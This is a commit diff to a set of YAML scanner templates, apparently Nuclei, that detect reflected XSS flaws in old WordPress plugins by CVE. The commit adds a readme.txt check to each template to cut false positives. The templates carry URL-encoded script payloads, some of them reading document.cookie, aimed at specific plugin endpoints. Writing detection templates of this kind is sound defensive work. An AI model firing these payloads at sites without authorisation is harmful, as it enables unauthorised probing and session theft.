Wordpress FP Fix

patch-1
Ritik Chaddha 2024-03-21 13:25:50 +05:30
parent 2ede6795a6
commit c68dd7249c
29 changed files with 389 additions and 3 deletions

View File

@ -30,7 +30,20 @@ info:
product: sniplets_plugin product: sniplets_plugin
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Code Snippets'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/flash-album-gallery" google-query: inurl:"/wp-content/plugins/flash-album-gallery"
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Grand Flagallery'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/adminimize/" google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Adminimize ==='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/skysa-official/" google-query: inurl:"/wp-content/plugins/skysa-official/"
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Skysa App'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ClickDesk Live Support - Live Chat'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -27,7 +27,20 @@ info:
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Featurific For Wordpress'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
tags: cve,cve2012,wordpress,xss,wp-plugin,timely tags: cve,cve2012,wordpress,xss,wp-plugin,timely
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'All-in-One Event Calendar'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,7 +29,20 @@ info:
product: wp-facethumb product: wp-facethumb
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP-FaceThumb ==='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -26,7 +26,20 @@ info:
product: mf_gig_calendar product: mf_gig_calendar
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'MF Gig Calendar ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -30,7 +30,22 @@ info:
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- '2 Click Social Media Buttons'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,7 +29,20 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Download Monitor ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,7 +29,20 @@ info:
product: wordpress_integrator product: wordpress_integrator
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Wordpress Integrator'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'

View File

@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/uploader" google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Uploader'
- "Tags:"
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,17 +29,32 @@ info:
google-query: inurl:"/wp-content/plugins/trafficanalyzer" google-query: inurl:"/wp-content/plugins/trafficanalyzer"
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'traffic analy'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "<script>alert(1)</script>" - "<script>alert(document.domain)</script>"
- type: word - type: word
part: header part: header

View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Category Grid View Gallery ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/duplicator" google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Duplicator - WordPress Migration'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

View File

@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/activehelper-livehelp" google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ActiveHelper LiveHelp Live Chat'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'

View File

@ -30,7 +30,23 @@ info:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Infusionsoft'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

View File

@ -28,7 +28,22 @@ info:
framework: wordpress framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/movies/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Movies ='
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

View File

@ -29,7 +29,22 @@ info:
framework: wordpress framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ultimate Weather'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/dzs-videogallery" google-query: inurl:"/wp-content/plugins/dzs-videogallery"
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Video Gallery WordPress DZS'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

View File

@ -30,7 +30,7 @@ info:
vendor: ab_google_map_travel_project vendor: ab_google_map_travel_project
product: ab_google_map_travel product: ab_google_map_travel
framework: wordpress framework: wordpress
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
http: http:
- raw: - raw:

View File

@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/navis-documentcloud" google-query: inurl:"/wp-content/plugins/navis-documentcloud"
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Navis'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -30,7 +30,20 @@ info:
framework: wordpress framework: wordpress
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Church Admin ='
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -27,7 +27,23 @@ info:
framework: wordpress framework: wordpress
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'SourceAfrica'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/wp-symposium" google-query: inurl:"/wp-content/plugins/wp-symposium"
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP Symposium'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -31,7 +31,20 @@ info:
google-query: inurl:"/wp-content/plugins/admin-font-editor" google-query: inurl:"/wp-content/plugins/admin-font-editor"
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Admin Font Editor'
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -29,7 +29,20 @@ info:
framework: wordpress framework: wordpress
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ajax Random Post'
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

View File

@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/anti-plagiarism" google-query: inurl:"/wp-content/plugins/anti-plagiarism"
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'anti plagiarism'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"